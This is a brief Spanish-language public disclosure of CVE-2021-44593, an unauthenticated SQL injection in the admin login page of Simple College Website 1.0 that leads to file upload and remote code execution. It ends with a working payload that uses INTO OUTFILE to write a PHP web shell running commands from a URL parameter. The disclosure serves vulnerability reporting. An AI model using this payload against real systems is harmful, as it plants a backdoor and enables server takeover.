
Divulgación pública y análisis de CVE-2021-44593, una inyección SQL no autenticada en Simple College Website que conduce a la carga arbitraria de archivos y a la ejecución remota de código.
Divulgación pública de CVE-2021-44593. Una vulnerabilidad de inyección SQL/carga arbitraria de archivos/ejecución remota de código en Simple College Website.
Simple College Website 1.0 es vulnerable a una inyección SQL basada en UNION sin autenticación en el parámetro "username" de la página /admin/login.php, que luego puede aprovecharse para cargar archivos arbitrarios y obtener ejecución remota de código.
La función login() en admin_class.php
' union select null, null, ("<?php system($_GET['cmd']);?>"), null, null INTO OUTFILE '/var/www/html/testing.php'; -- -